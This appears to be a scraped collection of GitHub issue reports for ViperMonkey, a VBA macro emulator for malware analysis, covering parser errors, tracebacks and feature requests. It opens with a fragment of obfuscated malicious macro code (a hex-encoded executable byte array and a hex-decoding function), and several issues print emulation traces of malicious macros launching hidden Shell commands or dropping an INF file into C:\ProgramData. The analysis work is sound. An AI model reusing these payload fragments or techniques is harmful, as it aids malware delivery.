&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2C&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H54&H30&H00&H00&H38&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H30&H00&H00&H00&H00&H00&H00&H9C&H00&H45&H78&H69&H74&H50&H72&H6F&H63&H65&H73&H73&H00&H00&H00&H00&H30&H00&H00&H4B&H45&H52&H4E&H45&H4C&H33&H32&H2E&H64&H6C&H6C&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H0
0&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H
00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H06&HFE&HFD&HAA&HD9&HCE&HBF&H07&H3F&HF6&H17&H89&H6E&HA8&H41&H86&HFC&H16&HED&HDC&H77&HBF&H0C&H76&HF4&H82&H88&H80&H3E&H77&H22&HEE
End SubPrivate Function ypqkgprlrkwz(ByVal ikhdopfqppzx As String) As String
Dim tbjpubienmri As Long
For tbjpubienmri = 1 To Len(ikhdopfqppzx) Step 2
ypqkgprlrkwz = ypqkgprlrkwz & Chr$(Val("&H" & Mid$(ikhdopfqppzx, tbjpubienmri, 2)))
Next tbjpubienmri
End Function
PARSING VBA CODE:
Module None
Sub Auto_Open (): 1 statement(s)
Sub fbbqjtjfsdnzrdatj()
^
Expected end of text (at char 95), (line:7, col:1)
Parse Error. Processing Aborted.
Accept source code as input
If I understand correctly, as of now the tool only accepts macro files. However, one often needs to make changes to the macro, eg. to make it work correctly with ViperMonkey. It would be helpful if I could directly pass the VBA source code (eg. python vmonkey.py Module1.bas) rather than having to compile it back into a macro and pass it back to ViperMonkey.
Anyway, great work! As soon as I have time I'll certainly contribute.
Make vmonkey's output more meaningful
Sorry if this is not a place to Ask something like this. ;)
This is the Result of the Macro. There are lot's of warnings but I am not any smarter what Shell Function will run. :(
MD5: 5533c54f77659ee6198c3e6f5485e6f2
TRACING VBA CODE (entrypoint = Auto*):
INFO ACTION: Found Entry Point - params 'document_open' -
INFO evaluating Sub Document_open
WARNING Variable 'IHLqsQXuiXFKJAfSwJF' not found
WARNING Variable 'HGUhvqSdZdmpItfnMQ' not found
WARNING Variable 'BLkIKAsQYliSmBzjNbMVsVv' not found
WARNING Variable 'ARcoFzOaDwBFuiVKHisonKIU' not found
WARNING Variable 'qKfcSRJGtsdcKz' not found
WARNING Variable 'BTLBQCLmccAvmzIV' not found
WARNING Variable 'zJiNQoMptPUvfhVZFAUvQr' not found
WARNING Variable 'PJrOIZsqbwTjwnzwF' not found
INFO calling Function: Shapes('zTnWboDjz')
INFO Looking up doc var shapes('ztnwbodjz').textframe
WARNING Variable 'jYwhGpospcJhTCQICNLDYTiw' not found
INFO Looking up doc var kqshztn.containingrange
WARNING Variable 'fbvuwib' not found
WARNING Variable 'UcmjJE' not found
WARNING Variable 'qXHBh' not found
WARNING Variable 'KVVVQoFw' not found
WARNING Variable 'BzpHpla' not found
WARNING Variable 'aFQsUEr' not found
WARNING Variable 'idLnl' not found
WARNING Variable 'vlNFC' not found
WARNING Variable 'RLIBq' not found
WARNING Variable 'DoiJb' not found
WARNING Variable 'waHtfjE' not found
WARNING Variable 'zbVzcnDwwoiqjDnUHQkT' not found
WARNING Variable 'rzKnTXbpvNbwGbjEEJVBaBP' not found
WARNING Variable 'lJTSWACZprkOSHCNhVTB' not found
WARNING Variable 'TapSUSsHXiNHFzVpLu' not found
WARNING Variable 'bMjiiU' not found
WARNING Variable 'dOjutwL' not found
WARNING Variable 'tmRQGMYr' not found
INFO calling Function: Shell('KqShZtn.ContainingRange', 0)
INFO Shell('KqShZtn.ContainingRange')
INFO ACTION: Execute Command - params 'KqShZtn.ContainingRange' - Shell function
WARNING Variable 'MumMhwRW' not found
INFO calling Function: Array('NULL', 'NULL', 'NULL', 0, 'NULL')
WARNING Variable 'jSzXLUGKWHsnmlGnfw' not found
Recorded Actions:
+-------------------+-------------------------+----------------+
| Action | Parameters | Description |
+-------------------+-------------------------+----------------+
| Found Entry Point | document_open | |
| Execute Command | KqShZtn.ContainingRange | Shell function |
+-------------------+-------------------------+----------------+
VBA Builtins Called: ['Array', 'Chr', 'Shapes', 'Shell']
Attribute Error extract_form_strings_extended
Testing this out for the first time and got the following error:
Traceback (most recent call last):
File "vmonkey.py", line 319, in process_file
for (subfilename, stream_path, form_variables) in vba.extract_form_strings_extended():
AttributeError: 'VBA_Parser' object has no attribute 'extract_form_strings_extended'
File MD5 is 1e094c664713fffd2ea965adf874a053
UnicodeDecodeError
this sample triggers a UnicodeDecodeError when calling prettytable to display the recorded actions at the end: https://www.hybrid-analysis.com/sample/0e70602d6f82e27686b5c1bba49f3889b5c5ddcd96bc0f0cad8c30743e63f87e?environmentId=100
Recorded Actions:
Traceback (most recent call last):
File "c:\python27\lib\site-packages\vipermonkey\vmonkey.py", line 404, in process_file
print(vm.dump_actions())
File "c:\python27\lib\site-packages\prettytable.py", line 240, in __str__
return self.__unicode__().encode(self.encoding)
File "c:\python27\lib\site-packages\prettytable.py", line 243, in __unicode__
return self.get_string()
File "c:\python27\lib\site-packages\prettytable.py", line 987, in get_string
formatted_rows = self._format_rows(rows, options)
File "c:\python27\lib\site-packages\prettytable.py", line 942, in _format_rows
return [self._format_row(row, options) for row in rows]
File "c:\python27\lib\site-packages\prettytable.py", line 939, in _format_row
return [self._format_value(field, value) for (field, value) in zip(self._field_names, row)]
File "c:\python27\lib\site-packages\prettytable.py", line 890, in _format_value
return self._unicode(value)
File "c:\python27\lib\site-packages\prettytable.py", line 181, in _unicode
value = unicode(value, self.encoding, "strict")
File "c:\python27\lib\encodings\utf_8.py", line 16, in decode
return codecs.utf_8_decode(input, errors, True)
UnicodeDecodeError: 'utf8' codec can't decode byte 0x94 in position 127: invalid start byte
NameError: name 'ParserElement' is not defined
Hi,
seems that using latest version of oletools (0.52.dev12) Vmonkey raises a traceback about pyparsing module.
File "/usr/local/lib/python2.7/dist-packages/vipermonkey-0.5-py2.7.egg/vipermonkey/core/init.py", line 91, in
ParserElement.enablePackrat()
NameError: name 'ParserElement' is not defined
Using older version of oletools everything is ok.
regards
VBA parser performance improvement for literals
Suggestion by Paul McGuire, pyparsing author:
One thing I noticed is that you implemented the low-level integer literals using Combine, Optional, Word, etc. I found when writing my Verilog parser that there is a real payoff in implementing these using the Regex class, since numeric literals appear very frequently in most code.
From literals.py, I think using these definitions would help somewhat with your performance issue:
decimal_literal = Regex(r"\d+[%&^]?").setParseAction(lambda t:int(t[0].rstrip("%&^"))).setName('decimal_literal')
octal_literal = Regex(r"&[oO][0-7]+[%&^]?").setParseAction(lambda t:int(t[0][2:].rstrip("%&^"), 8)).setName('decimal_literal')
hex_literal = Regex(r"&[hH][0-9a-fA-F]+[%&^]?").setParseAction(lambda t:int(t[0][2:].rstrip("%&^"), 16)).setName('decimal_literal')
Shell Constants in vba_library.py
# Shell Constants
('vbHide', 0),
('vbNormalFocus', 1),
('vbMinimizedFocus.', 2),
('vbMaximizedFocus', 3),
('vbNormalNoFocus', 4),
('vbMinimizedNoFocus', 6),
Expected end of text error throwing in script
PARSING VBA CODE:
INFO parsed Sub Img_Painted ([hHZIubL as Long, AoLnF as IInkRectangle]): 3 statement(s)
Module 'ThisDocument'
Sub Img_Painted ([hHZIubL as Long, AoLnF as IInkRectangle]): 3 statement(s)
*** PARSING ERROR ***
Public Sub xvkBjM()
^
Expected end of text (at char 526), (line:16, col:1)
TRACING VBA CODE (entrypoint = Auto*):
Recorded Actions:
+--------+------------+-------------+
| Action | Parameters | Description |
+--------+------------+-------------+
+--------+------------+-------------+
ImportError: No module named codes
Hello,
I have followed the same steps as #40, but I have next error:
Traceback (most recent call last):
File ".\vmonkey.py", line 103, in <module>
from oletools.olevba import VBA_Parser, filter_vba
File "C:\Users\xxx\Desktop\tools\pythonSW\PythonOld\lib\site-packages\oletools\olevba.py", line 300, in <module>
from oletools import rtfobj
File "C:\Users\xxx\Desktop\tools\pythonSW\PythonOld\lib\site-packages\oletools\rtfobj.py", line 121, in <module>
from oletools.thirdparty.tablestream import tablestream
File "C:\Users\xxx\Desktop\tools\pythonSW\PythonOld\lib\site-packages\oletools\thirdparty\tablestream\tablestream.py", line 82, in <module>
import colorclass
File "C:\Users\xxx\Desktop\tools\pythonSW\PythonOld\lib\site-packages\oletools\thirdparty\colorclass\__init__.py", line 11, in <module>
from colorclass.codes import list_tags # noqa
ImportError: No module named codes
Expected behavior
usage of vmonkey
Desktop (please complete the following information):
- OS: Windows 10
Thank you
ParserElement not defined
Hello ,
I am new to using this tool.
When I am trying to execute the python code, it shows me this error.
Traceback (most recent call last):
File "vmonkey.py", line 103, in
from core import *
File "/home/remnux/Desktop/ViperMonkey/ViperMonkey-master/vipermonkey/core/init.py", line 91, in
ParserElement.enablePackrat()
NameError: global name 'ParserElement' is not defined
Any help is highly appreciated.
Function Sin, Tan ecc not found.
hi i love your tool i try to decode a vba but i found some problem with some funcion
PARSING VBA CODE:
INFO parsed Function wbDvMsnKwQF (): 189 statement(s)
Module 'BORKmQvFwpd'
Function wbDvMsnKwQF (): 189 statement(s)
TRACING VBA CODE (entrypoint = Auto*):
INFO calling Function: Sin(12)
ERROR Function 'Sin' not found
ERROR Impossible to subtract arguments of different types
ERROR Impossible to sum arguments of different types
INFO calling Function: Tan(0)
ERROR Function 'Tan' not found
ERROR Impossible to multiply arguments of different types
ERROR Impossible to divide arguments of different types
INFO calling Function: Log(97)
ERROR Function 'Log' not found
ERROR Impossible to sum arguments of different types
INFO calling Function: Atn(0)
ERROR Function 'Atn' not found
ERROR Impossible to sum arguments of different types
Traceback (most recent call last):
can you help ?
thank you a lot
Too many open files
Hi, I run analysis and it' started to show real meaning of the macro and then at the end
.
.
.
INFO calling Function: QEh('C:\\ProgramData\\golangSource.htm', 'l')
INFO calling Function: ERb('C:\\ProgramData\\golangSource.html', '[version]\r\nSignature =$chicago$\r\n\r\n...)
INFO calling Function: CreateObject('Scripting.FileSystemObject')
INFO ACTION: CreateObject - params ['Scripting.FileSystemObject'] - Interesting Function Call
INFO calling Function: CreateTextFile('C:\\ProgramData\\golangSource.html', True, True)
INFO ACTION: CreateTextFile - params ['C:\\ProgramData\\golangSource.html', True, True] - Interesting Function Call
INFO calling Function: Write('[version]\r\nSignature =$chicago$\r\n\r\n[golangSource]\r\nUnRegisterOCXs = Eve...)
ERROR Cannot process Write(). Too many open files.
Segmentation fault (core dumped)
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.